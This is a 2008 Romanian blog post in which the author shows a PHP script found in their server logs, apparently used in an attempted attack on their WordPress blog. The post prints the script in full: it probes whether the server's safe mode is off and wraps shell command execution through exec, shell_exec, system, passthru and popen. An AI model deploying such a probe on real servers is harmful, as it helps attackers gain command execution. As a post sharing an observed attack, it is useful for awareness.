Hack blog - wordpress!?

Ceva de genul au incercat niste “baieti destepti” sa faca pe blog la mine. Luati de priviti. yahoo_giggle Hack blog - wordpress!?
PS: Gasit prin loguri de la adresa: http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt

< ?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Din cate am citit pe internet tinta nu ar fi platforma wordpress, dar totusi stau si ma gandesc ca prea-s apropiate in loguri. Adica asta care v-am aratat acum si asta.

Articole asemanatoare:

  1. PHP Script - curs valutar Facut mai in joaca, dar poate ajuta pe cineva. Scriptul...
  2. Blog Wordpress: Dezactiveaza post revision Majoritatea bloggerilor nu folosesc post revision, iar multi dintre ei...
  3. Teoblog.net was hacked Se pare ca un folder din teoblog.net a fost hackerit....
  4. Download, instalare si configurare wordpress Acest tutorial va raspunde exact cerintelor dumneavoastra de a va...
  5. Wordpress 2.5.1 vulnerabil!? Nu stiu de ce imi arata asa, dar stau si...

> Ti-a placut acest articol? Aboneaza-te la feed-ul acestui blog.

1 comentarii la “Hack blog - wordpress!?”

Ana Hegyi a scris pe 29 Aprilie 2008 la ora 21:26:

Chiar e tare!Am luat aminte!sa ne mai bucuri cu asemenea articole!

Lasă un comentariu

:) :( :d :"> :(( \:d/ :x 8-| /:) :o :-? :-" :-w ;) [-( :)>- toate »